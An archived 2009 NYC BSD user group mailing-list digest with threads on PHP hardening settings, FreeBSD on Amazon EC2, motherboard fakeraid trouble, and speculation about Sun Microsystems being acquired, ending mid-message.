References: <49B83DBB.9070005@bad-apples.org> Message-ID: <20090312.132146.45270190.jun@soum.co.jp> From: Mark Saad Subject: [nycbug-talk] Kqemu and BSD Date: Wed, 11 Mar 2009 18:39:55 -0400 > I was wondering who is using Qemu with Kqemu support under *BSD. > What do you think of it. for NetBSD-4.0 & 5.0-RC1 by minoura at netbsd. http://www.minoura.org/~minoura/kqemu-090125/ -- jun ebihara From spork at bway.net Thu Mar 12 00:50:59 2009 From: spork at bway.net (Charles Sprickman) Date: Thu, 12 Mar 2009 00:50:59 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> Message-ID: On Wed, 11 Mar 2009, Marc Spitzer wrote: > The thing is most of your exposure is your php website, how are you > managing that? Much of the php code out there was not written by > experts from MIT but by people who code in ee, think notepad but > worse, and have never had any formal training in CS/Programming. Are > you using any of their code? And I do not mean you but the modules > you may pull in from ports or the internet. I am very new to php "security", but even this little doc from the Joomla site has what appear to be some very good suggestions to eliminate some of the more common threats: http://docs.joomla.org/Security_Checklist_2_-_Hosting_and_Server_Setup#Configuring_PHP I found this comment rather interesting: ----- Don't use PHP safe_mode Avoid the use of PHP safe_mode. This is a valid but incomplete solution to a deeper problem and provides a false sense of security. See the official PHP site for an explanation of this issue. ----- The "open_basedir" and "disable_functions" directives were new to me. They both look like they would be very sensible things to configure on any php installation. Charles > night, > > marc > -- > Freedom is nothing but a chance to be better. > Albert Camus > From akosela at andykosela.com Thu Mar 12 02:54:38 2009 From: akosela at andykosela.com (Andy Kosela) Date: Thu, 12 Mar 2009 07:54:38 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> Message-ID: <49b8b1ae.FQgG2OWBFhmYhRyU%akosela@andykosela.com> Marc Spitzer wrote: > And it is also doable to root you with a Kernel Loadable Module that > in kernel space you can do all sorts of games with to hide from the > system. Kernel security level >= 1 will prevent that. It is usually safe to run at level 2 or even 3. --Andy From matt at atopia.net Thu Mar 12 02:56:32 2009 From: matt at atopia.net (Matt Juszczak) Date: Thu, 12 Mar 2009 02:56:32 -0400 (EDT) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49b8b1ae.FQgG2OWBFhmYhRyU%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> <49b8b1ae.FQgG2OWBFhmYhRyU%akosela@andykosela.com> Message-ID: > Kernel security level >= 1 will prevent that. It is usually safe to run > at level 2 or even 3. > > --Andy I always run in 2. So I guess that helps me a little bit. From akosela at andykosela.com Thu Mar 12 03:01:29 2009 From: akosela at andykosela.com (Andy Kosela) Date: Thu, 12 Mar 2009 08:01:29 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> Message-ID: <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com> Charles Sprickman wrote: > I found this comment rather interesting: > > ----- > Don't use PHP safe_mode > Avoid the use of PHP safe_mode. This is a valid but incomplete solution to > a deeper problem and provides a false sense of security. See the official > PHP site for an explanation of this issue. > ----- >From php.ini: ; Safe Mode ; ; SECURITY NOTE: The FreeBSD Security Officer strongly recommend that ; the PHP Safe Mode feature not be relied upon for security, since the ; issues Safe Mode tries to handle cannot properly be handled in PHP ; (primarily due to PHP's use of external libraries). While many bugs ; in Safe Mode has been fixed it's very likely that more issues exist ; which allows a user to bypass Safe Mode restrictions. ; For increased security we recommend to always install the Suhosin ; extension. > The "open_basedir" and "disable_functions" directives were new to me. > They both look like they would be very sensible things to configure on any > php installation. There are some performance problems with using 'open_basedir' on FreeBSD. Google for that. Also if your application doesn't need it, disable 'allow_url_fopen'. --Andy From mterenzio at gmail.com Sat Mar 14 15:58:06 2009 From: mterenzio at gmail.com (Matthew Terenzio) Date: Sat, 14 Mar 2009 15:58:06 -0400 Subject: [nycbug-talk] EC2 and FreeBSD Message-ID: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Amazon announced their "reserved instances" for EC2 I noticed a mention of FreeBSD in their FAQ: Q: What operating system environments are supported? Amazon EC2 currently supports a variety of operating systems including: RedHat Linux, Windows Server, openSuSE Linux, Fedora, Debian, OpenSolaris, Cent OS, Gentoo Linux, Oracle Linux, and FreeBSD. We are looking for ways to expand it to other platforms in future releases. My understanding was that this wasn't happening until 8.0 release at earliest, which may be some time from now. Just a typo? -------------- next part -------------- An HTML attachment was scrubbed... URL: From pete at nomadlogic.org Sat Mar 14 16:21:23 2009 From: pete at nomadlogic.org (Pete Wright) Date: Sat, 14 Mar 2009 13:21:23 -0700 Subject: [nycbug-talk] EC2 and FreeBSD In-Reply-To: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Message-ID: <4FEB02E5-D9DC-45B3-A621-0CAEE3315D38@nomadlogic.org> On 14-Mar-09, at 12:58 PM, Matthew Terenzio wrote: > Amazon announced their "reserved instances" for EC2 I noticed a > mention of FreeBSD in their FAQ: > > Q: What operating system environments are supported? > Amazon EC2 currently supports a variety of operating systems > including: RedHat Linux, Windows Server, openSuSE Linux, Fedora, > Debian, OpenSolaris, Cent OS, Gentoo Linux, Oracle Linux, and > FreeBSD. We are looking for ways to expand it to other platforms in > future releases. > > My understanding was that this wasn't happening until 8.0 release at > earliest, which may be some time from now. Just a typo? > oh that's pretty exciting. i'm going to have to check that out on monday when i get to work (i don't have my ec2 account info w/ me :( ). we've been using the ec2 to do testing of some scalability testing of our webapps and have been happily surprised with it's performance... -p From chsnyder at gmail.com Sun Mar 15 10:05:22 2009 From: chsnyder at gmail.com (Chris Snyder) Date: Sun, 15 Mar 2009 10:05:22 -0400 Subject: [nycbug-talk] EC2 and FreeBSD In-Reply-To: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Message-ID: On Sat, Mar 14, 2009 at 3:58 PM, Matthew Terenzio wrote: > Amazon announced their "reserved instances" for EC2 I noticed a mention of > FreeBSD in their FAQ: > > Q: What operating system environments are supported? > > Amazon EC2 currently supports a variety of operating systems including: > RedHat Linux, Windows Server, openSuSE Linux, Fedora, Debian, OpenSolaris, > Cent OS, Gentoo Linux, Oracle Linux, and FreeBSD. We are looking for ways to > expand it to other platforms in future releases. > > My understanding was that this wasn't happening until 8.0 release at > earliest, which may be some time from now. Just a typo? Seems like a typo. There are no FreeBSD AMIs (images) in the community list, so if anyone IS running it, they aren't sharing yet. Chris Snyder http://chxor.chxo.com/ From slynch2112 at me.com Sun Mar 15 13:36:20 2009 From: slynch2112 at me.com (Siobhan Lynch) Date: Sun, 15 Mar 2009 13:36:20 -0400 Subject: [nycbug-talk] EC2 and FreeBSD In-Reply-To: References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Message-ID: <49BD3C94.7020803@me.com> On 3/15/09 10:05 AM, Chris Snyder wrote: > > > Seems like a typo. > > There are no FreeBSD AMIs (images) in the community list, so if anyone > IS running it, they aren't sharing yet. > > I did a search through public AMI's via Elasticfox - and "bsd" does not show up anywhere as of yet. -Trish From kacanski_s at yahoo.com Mon Mar 16 11:27:09 2009 From: kacanski_s at yahoo.com (Aleksandar Kacanski) Date: Mon, 16 Mar 2009 08:27:09 -0700 (PDT) Subject: [nycbug-talk] issues with built in raid on Asus M3A79-T DELUXE Message-ID: <508110.23824.qm@web53611.mail.re2.yahoo.com> Hi, I tried installation with FBSD 7.1 on Asus M3A79-T DELUXE with two SSD SATA drives. It works fine when bios is configured without SATA RAID 0/1/5/10, eg. ISA; AHCI. As soon as I engage raid, the BTX loader will try to load configuration, and box will recycle hard. Any suggestions? --Aleksandar (Sasha) Kacanski From skreuzer at exit2shell.com Mon Mar 16 11:43:59 2009 From: skreuzer at exit2shell.com (Steven Kreuzer) Date: Mon, 16 Mar 2009 11:43:59 -0400 Subject: [nycbug-talk] EC2 and FreeBSD In-Reply-To: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Message-ID: On Mar 14, 2009, at 3:58 PM, Matthew Terenzio wrote: > Amazon announced their "reserved instances" for EC2 I noticed a > mention of FreeBSD in their FAQ: > > Q: What operating system environments are supported? > Amazon EC2 currently supports a variety of operating systems > including: RedHat Linux, Windows Server, openSuSE Linux, Fedora, > Debian, OpenSolaris, Cent OS, Gentoo Linux, Oracle Linux, and > FreeBSD. We are looking for ways to expand it to other platforms in > future releases. > > My understanding was that this wasn't happening until 8.0 release at > earliest, which may be some time from now. Just a typo? Seems like it was a mistake because its not listed in the support operating systems table anymore. Also, FreeBSD 8 will not support Xen 3.0.3 or earlier. EC2 uses 3.0.3 -- Steven Kreuzer http://www.exit2shell.com/~skreuzer -------------- next part -------------- An HTML attachment was scrubbed... URL: From chsnyder at gmail.com Mon Mar 16 11:53:24 2009 From: chsnyder at gmail.com (Chris Snyder) Date: Mon, 16 Mar 2009 11:53:24 -0400 Subject: [nycbug-talk] EC2 and FreeBSD In-Reply-To: References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Message-ID: 2009/3/16 Steven Kreuzer : > Seems like it was a mistake because its not listed in the support operating > systems table anymore. > Also, FreeBSD 8 will not support Xen 3.0.3 or earlier. EC2 uses 3.0.3 Couldn't we run FreeBSD on ec2 as a vmware guest on top of Debian? From mterenzio at gmail.com Mon Mar 16 11:53:56 2009 From: mterenzio at gmail.com (Matthew Terenzio) Date: Mon, 16 Mar 2009 11:53:56 -0400 Subject: [nycbug-talk] EC2 and FreeBSD In-Reply-To: References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Message-ID: <852b23f40903160853s312bdf94h2065fca950ea73d5@mail.gmail.com> > > Seems like it was a mistake because its not listed in the support operating > systems table anymore. > I believe it's a mistake too, unless they have plans to make the newer version of Xen available soon. But for the record, FreeBSD wasn't listed in that Operating Systems table you mention, it was in the Reserved Instances FAQ, and still is. http://aws.amazon.com/ec2/faqs/#What_operating_system_environments_are_supported -------------- next part -------------- An HTML attachment was scrubbed... URL: From carton at Ivy.NET Mon Mar 16 15:11:42 2009 From: carton at Ivy.NET (Miles Nordin) Date: Mon, 16 Mar 2009 15:11:42 -0400 Subject: [nycbug-talk] issues with built in raid on Asus M3A79-T DELUXE In-Reply-To: <508110.23824.qm@web53611.mail.re2.yahoo.com> (Aleksandar Kacanski's message of "Mon, 16 Mar 2009 08:27:09 -0700 (PDT)") References: <508110.23824.qm@web53611.mail.re2.yahoo.com> Message-ID: >>>>> "ak" == Aleksandar Kacanski writes: ak> As soon as I engage raid, it's fakeraid. http://linuxmafia.com/faq/Hardware/sata.html#fakeraid you can use AHCI mode and geom instead, but if a drive dies you will probably have to do something manual to make the machine boot again. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From carton at Ivy.NET Mon Mar 16 15:12:41 2009 From: carton at Ivy.NET (Miles Nordin) Date: Mon, 16 Mar 2009 15:12:41 -0400 Subject: [nycbug-talk] EC2 and FreeBSD In-Reply-To: (Chris Snyder's message of "Mon, 16 Mar 2009 11:53:24 -0400") References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com> Message-ID: >>>>> "cs" == Chris Snyder writes: cs> Couldn't we run FreeBSD on ec2 as a vmware guest on top of cs> Debian? no http://lists.xensource.com/archives/html/xen-users/2005-05/msg00549.html netbsd has kept up with Xen more aggressively, so you might have luck getting bsd goodness squeezed into EC2 expensiveness there. but it sounds like freebsd is the one seriously trying to compete with linux performance, albeit only for extremely simple tasks like LAMP hosting, so I don't know if you're interested or not. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From spork at bway.net Tue Mar 17 01:47:07 2009 From: spork at bway.net (Charles Sprickman) Date: Tue, 17 Mar 2009 01:47:07 -0400 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com> Message-ID: <10A22595-16C9-47F0-89C8-36DC9F941F7C@bway.net> On Mar 12, 2009, at 3:01 AM, Andy Kosela wrote: > Charles Sprickman wrote: > >> I found this comment rather interesting: >> >> ----- >> Don't use PHP safe_mode >> Avoid the use of PHP safe_mode. This is a valid but incomplete >> solution to >> a deeper problem and provides a false sense of security. See the >> official >> PHP site for an explanation of this issue. >> ----- > > From php.ini: > > ; Safe Mode > ; > ; SECURITY NOTE: The FreeBSD Security Officer strongly recommend that > ; the PHP Safe Mode feature not be relied upon for security, since the > ; issues Safe Mode tries to handle cannot properly be handled in PHP > ; (primarily due to PHP's use of external libraries). While many bugs > ; in Safe Mode has been fixed it's very likely that more issues exist > ; which allows a user to bypass Safe Mode restrictions. > ; For increased security we recommend to always install the Suhosin > ; extension. > >> The "open_basedir" and "disable_functions" directives were new to me. >> They both look like they would be very sensible things to configure >> on any >> php installation. > > There are some performance problems with using 'open_basedir' on > FreeBSD. Google for that. I did find some info on that, and then I also found this: http://www.hardened-php.net/suhosin/a_feature_list:realpath.html "To stop all these attacks Suhosin replaces the realpath() function PHP uses with the one implemented by FreeBSD which was the most robust one at the time this patch was created." So FreeBSD's realpath() is slow, but it is "more correct" I suppose. > Also if your application doesn't need it, disable 'allow_url_fopen'. That's a tough one... I know I've got some stuff that pulls in RSS feeds, need to look at how that's done. Thanks, Charles > > --Andy Charles Sprickman NetEng/SysAdmin Bway.net - New York's Best Internet - www.bway.net spork at bway.net - 212.655.9344 From akosela at andykosela.com Tue Mar 17 07:18:41 2009 From: akosela at andykosela.com (Andy Kosela) Date: Tue, 17 Mar 2009 12:18:41 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <10A22595-16C9-47F0-89C8-36DC9F941F7C@bway.net> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com> <10A22595-16C9-47F0-89C8-36DC9F941F7C@bway.net> Message-ID: <49bf8711.9yxOPKmKuVThxOgY%akosela@andykosela.com> Charles Sprickman wrote: > So FreeBSD's realpath() is slow, but it is "more correct" I suppose. The never ending dilemma -- speed vs. stable & secure. On the one extreme we got Linux, and on the other OpenBSD. Both positions are not ideal IMHO. But only a rational mean, a harmony between the speed and security is the best approach. To me, FreeBSD is striving for this goal, but in this particular case the implementation was just too slow. This approach was already known to the philosophy of Plato where he was describing a mean between two extremes 'peras' and 'apeiron'. The nature only works like that, so we should try to imitate Her. --Andy From skreuzer at exit2shell.com Wed Mar 18 10:14:48 2009 From: skreuzer at exit2shell.com (Steven Kreuzer) Date: Wed, 18 Mar 2009 10:14:48 -0400 Subject: [nycbug-talk] Sun News Roundup Message-ID: Interesting morning for Sun Microsystems: Today at CommunityOne in New York, Sun is announcing some Cloud- related stuff http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g -- Steven Kreuzer http://www.exit2shell.com/~skreuzer From george at ceetonetechnology.com Wed Mar 18 17:46:22 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 18 Mar 2009 17:46:22 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: Message-ID: <49C16BAE.5030305@ceetonetechnology.com> Steven Kreuzer wrote: > Interesting morning for Sun Microsystems: > > Today at CommunityOne in New York, Sun is announcing some Cloud- > related stuff > http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud > > Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g > On the second point, may I refer others back to the past thread? :) IMHO, the MySQL purchase (for $1b or so) was likely a way to pump up their asset value on the books. . . g From pete at nomadlogic.org Wed Mar 18 19:02:53 2009 From: pete at nomadlogic.org (Pete Wright) Date: Wed, 18 Mar 2009 16:02:53 -0700 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <49C16BAE.5030305@ceetonetechnology.com> References: <49C16BAE.5030305@ceetonetechnology.com> Message-ID: On 18-Mar-09, at 2:46 PM, George Rosamond wrote: > Steven Kreuzer wrote: >> Interesting morning for Sun Microsystems: >> >> Today at CommunityOne in New York, Sun is announcing some Cloud- >> related stuff >> http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud >> >> Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g >> > > On the second point, may I refer others back to the past thread? > > :) funny - i just had a meeting with some sun reps. oddly enough the SE had an IBM laptop. coincidence?!? yea probably...but anyway it was fun to call the sun guys "IBM'ers" and ask them when we can start running AIX in a solaris zone :) -p From nonesuch at bad-apples.org Wed Mar 18 19:06:04 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 18 Mar 2009 19:06:04 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> Message-ID: <49C17E5C.609@bad-apples.org> I keep seeing sun staffers with mac's the scuttlebutt said Apple would buy them out. Wonder if that was every a real option. Pete Wright wrote: > On 18-Mar-09, at 2:46 PM, George Rosamond wrote: > > >> Steven Kreuzer wrote: >> >>> Interesting morning for Sun Microsystems: >>> >>> Today at CommunityOne in New York, Sun is announcing some Cloud- >>> related stuff >>> http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud >>> >>> Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g >>> >>> >> On the second point, may I refer others back to the past thread? >> >> :) >> > > funny - i just had a meeting with some sun reps. oddly enough the SE > had an IBM laptop. coincidence?!? yea probably...but anyway it was > fun to call the sun guys "IBM'ers" and ask them when we can start > running AIX in a solaris zone :) > > -p > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- ]Mark Saad[ mark at bad-apples.org () ascii ribbon campaign - against html e-mail /\ www.asciiribbon.org - against proprietary attachments From george at ceetonetechnology.com Wed Mar 18 19:56:40 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 18 Mar 2009 19:56:40 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <49C17E5C.609@bad-apples.org> References: <49C16BAE.5030305@ceetonetechnology.com> <49C17E5C.609@bad-apples.org> Message-ID: <49C18A38.5040701@ceetonetechnology.com> Mark Saad wrote: > I keep seeing sun staffers with mac's the scuttlebutt said Apple would > buy them out. Wonder if that was every a real option. > i doubt that it was a real option. . . Apple dropped the enterprise a long while ago, and wants to maintain its grip on soho, chelsea, etc. George From akosela at andykosela.com Thu Mar 19 06:41:29 2009 From: akosela at andykosela.com (Andy Kosela) Date: Thu, 19 Mar 2009 11:41:29 +0100 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> Message-ID: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> Pete Wright wrote: > > On 18-Mar-09, at 2:46 PM, George Rosamond wrote: > > > Steven Kreuzer wrote: > >> Interesting morning for Sun Microsystems: > >> > >> Today at CommunityOne in New York, Sun is announcing some Cloud- > >> related stuff > >> http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud > >> > >> Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g > >> > funny - i just had a meeting with some sun reps. oddly enough the SE > had an IBM laptop. coincidence?!? yea probably...but anyway it was > fun to call the sun guys "IBM'ers" and ask them when we can start > running AIX in a solaris zone :) For the Sun that move would be as wise as Yahoo to agree to Microsoft proposal... --Andy From carton at Ivy.NET Thu Mar 19 13:54:53 2009 From: carton at Ivy.NET (Miles Nordin) Date: Thu, 19 Mar 2009 13:54:53 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> (Andy Kosela's message of "Thu, 19 Mar 2009 11:41:29 +0100") References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> Message-ID: >>>>> "ak" == Andy Kosela writes: ak> For the Sun that move would be as wise as Yahoo to agree to ak> Microsoft proposal... lolz, yeah. but...for example, Sun has an ``enterprise mail'' package. it's huge, like Zimbra-huge, highly scalable, had Ajax-y stuff even in the ancient 2005 release I'm still using. Nobody seems to know about it. They talk about Zimbra, Scalix, imp/horde/kolab, but not the Sun package. why? well there are a few possible answers. maybe it's too ``hard to install'' (wtf?!), or no one is interested in a package where you get ``some'' of the source code---if we're ditching Exchange then we want ALL source under a reasonable license. And we want the source for the goddamn stable version which we are actually _running_ in production, we do not want some whacked out source for an unpatchable flakey development version which you call the ``community'' version. All three under Sun's control, and their so-called open-source stuff I've dug into (Solaris, Javur) seems to make the second two mistakes. Have you heard about their frankengcc? It's neat, and I plan to use it. I also find it HIGHLY offensive, though I guess people who use *BSD are required to swear loyalty to the BSD license instead of GPL so you will probably not be offended, but at least you can still understand, the software Sun has co-opted here is GPL software, so the authors of the software would probably be offended, and even as BSD advocates you may agree far enough to empathize for how the author's intent was frustrated by Sun's sneaky pedantic manoevering: http://cooltools.sunsource.net/gcc/ But, I don't think that's why people haven't heard of the Sun mail package. I think there is only one real reason. It's because no one knows what it's *CALLED*! I cannot even tell you. And if I tried, someone would disagree with me and say, ``no no actually that name refers to Sun's .'' Their brokeass monkey-marketing department keeps renaming it, and combining and uncombining it with other products like some little dancing-feces puppet show. Sun also has a nameless portal/wiki/CMS package which has at least three different names so you go blind trying to figure out what is inside it and what you're downloading. http://blogs.sun.com/portal/resource/websynergy-release-2.png I HOPE THE DIAGRAM MAKES EVERYTHING CLEAR. Even OpenSolaris itself, something even more vile and confusing than a rename has happened---they took the existing name and REPOINTED it at something completely different, in such an arcane way that I would have to give a 5-year Sun history lesson to explain the details of the change and why they are significant and mess up everyone's conversations. It's like some Orwellian newspeak. If IBM bought them and reduced redundancies by firing their entire marketing department, then immediately sold them to Radio Shack or something, that'd be a tremendous improvement in their chances for survival. But yeah, the brilliant work of fresh college grads that made Sun great in the old days has already been largely squished by this new regime that insists on pandering to idiot Bank sysadmins, and it smells liek there's this growing culture of laziness-as-a-virtue festering in there---like, the Tier 1 phonemonkeys in the call center seem to be running the entire company, bossing around the developers to the point they live in fear and create these assertion-riddled Fisher Price interfaces with binary config files, because they don't want anything that'll be a ``call generator''. or, maybe the Tier 1 techs are in fact taking orders from the lunchladies in the cafeteria. It's structured as one of these ``bottom up'' companies, you know, because that's how you incubate bold new ideas. I sort of wish Google would buy them and turn them Evil. At least they'd get more work done. ``Following our assimi^Waquisition of Sun, there will be no further releases of Solaris. The community is welcome to fork the CDDL bits. Good luck re-implementing the binary parts (hint: start with the C compiler, then move on to scsi_vhci. oh did we stop giving you X source at some point? 's our right.). The good news is, we will be deploying the new private version throguhout our hosted Cloud, and you can use as much Solaris CPU as you like on our machines for free! free, as in $0! isn't that fantastic? you're free! so long as you sign this simple agreement! All the GPL tools are there, too, with our improvements. However since we are not actually releasing any longer, just hosting, you will not get source for them, so sorry about that and welcome to the Future!'' -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From raj at brainlink.com Thu Mar 19 14:15:42 2009 From: raj at brainlink.com (Raj Goel) Date: Thu, 19 Mar 2009 14:15:42 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> Message-ID: <49C28BCE.7080806@brainlink.com> Please don't insult dung-flinging monkeys in a dancing show -- they have some use in the universe. Sun's marketing/branding team otoh, has no real purpose, except to generate negative revenues. And Sun sales' incompetency can leave very little to be desired -- I've found it easier/faster to buy from the Sun/eBay team, then from Sun sales. If we could combine Apple's marketing, Sun's hardware + Solaris, and Google's halo of "trust us, we're not evil..." THAT would be a lethal combination. -- Raj Rajesh Goel, CISSP cell (917) 685-7731 CTO: Brainlink International, Inc. "IT Management and Solutions" Miles Nordin wrote: >>>>>> "ak" == Andy Kosela writes: > > ak> For the Sun that move would be as wise as Yahoo to agree to > ak> Microsoft proposal... > > lolz, yeah. > > but...for example, Sun has an ``enterprise mail'' package. it's huge, > like Zimbra-huge, highly scalable, had Ajax-y stuff even in the > ancient 2005 release I'm still using. Nobody seems to know about it. > They talk about Zimbra, Scalix, imp/horde/kolab, but not the Sun > package. why? > > well there are a few possible answers. maybe it's too ``hard to > install'' (wtf?!), or no one is interested in a package where you get > ``some'' of the source code---if we're ditching Exchange then we want > ALL source under a reasonable license. And we want the source for the > goddamn stable version which we are actually _running_ in production, > we do not want some whacked out source for an unpatchable flakey > development version which you call the ``community'' version. All > three under Sun's control, and their so-called open-source stuff I've > dug into (Solaris, Javur) seems to make the second two mistakes. > > Have you heard about their frankengcc? It's neat, and I plan to use > it. I also find it HIGHLY offensive, though I guess people who use > *BSD are required to swear loyalty to the BSD license instead of GPL > so you will probably not be offended, but at least you can still > understand, the software Sun has co-opted here is GPL software, so the > authors of the software would probably be offended, and even as BSD > advocates you may agree far enough to empathize for how the author's > intent was frustrated by Sun's sneaky pedantic manoevering: > > http://cooltools.sunsource.net/gcc/ > > But, I don't think that's why people haven't heard of the Sun mail > package. I think there is only one real reason. > > > It's because no one knows what it's *CALLED*! I cannot even tell you. > And if I tried, someone would disagree with me and say, ``no no > actually that name refers to Sun's .'' Their brokeass > monkey-marketing department keeps renaming it, and combining and > uncombining it with other products like some little dancing-feces > puppet show. Sun also has a nameless portal/wiki/CMS package which > has at least three different names so you go blind trying to figure > out what is inside it and what you're downloading. > > http://blogs.sun.com/portal/resource/websynergy-release-2.png > > I HOPE THE DIAGRAM MAKES EVERYTHING CLEAR. Even OpenSolaris itself, > something even more vile and confusing than a rename has > happened---they took the existing name and REPOINTED it at something > completely different, in such an arcane way that I would have to give > a 5-year Sun history lesson to explain the details of the change and > why they are significant and mess up everyone's conversations. It's > like some Orwellian newspeak. > > If IBM bought them and reduced redundancies by firing their entire > marketing department, then immediately sold them to Radio Shack or > something, that'd be a tremendous improvement in their chances for > survival. > > But yeah, the brilliant work of fresh college grads that made Sun > great in the old days has already been largely squished by this new > regime that insists on pandering to idiot Bank sysadmins, and it > smells liek there's this growing culture of laziness-as-a-virtue > festering in there---like, the Tier 1 phonemonkeys in the call center > seem to be running the entire company, bossing around the developers > to the point they live in fear and create these assertion-riddled > Fisher Price interfaces with binary config files, because they don't > want anything that'll be a ``call generator''. or, maybe the Tier 1 > techs are in fact taking orders from the lunchladies in the cafeteria. > It's structured as one of these ``bottom up'' companies, you know, > because that's how you incubate bold new ideas. > > I sort of wish Google would buy them and turn them Evil. At least > they'd get more work done. > > ``Following our assimi^Waquisition of Sun, there will be no further > releases of Solaris. The community is welcome to fork the CDDL bits. > Good luck re-implementing the binary parts (hint: start with the C > compiler, then move on to scsi_vhci. oh did we stop giving you X > source at some point? 's our right.). The good news is, we > will be deploying the new private version throguhout our hosted Cloud, > and you can use as much Solaris CPU as you like on our machines for > free! free, as in $0! isn't that fantastic? you're free! so long > as you sign this simple agreement! All the GPL tools are there, too, > with our improvements. However since we are not actually releasing > any longer, just hosting, you will not get source for them, so > sorry about that and welcome to the Future!'' > > > ------------------------------------------------------------------------ > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk From mspitzer at gmail.com Thu Mar 19 15:41:55 2009 From: mspitzer at gmail.com (Marc Spitzer) Date: Thu, 19 Mar 2009 15:41:55 -0400 Subject: [nycbug-talk] 64gb usb2 stick 109 Message-ID: <8c50a3c30903191241u1e25519bp15241614cd8dddb9@mail.gmail.com> http://www.buy.com/prod/kingston-64gb-datatraveler-150-flash-drive/q/loc/101/210199009.html -- Freedom is nothing but a chance to be better. Albert Camus From akosela at andykosela.com Thu Mar 19 18:43:07 2009 From: akosela at andykosela.com (Andy 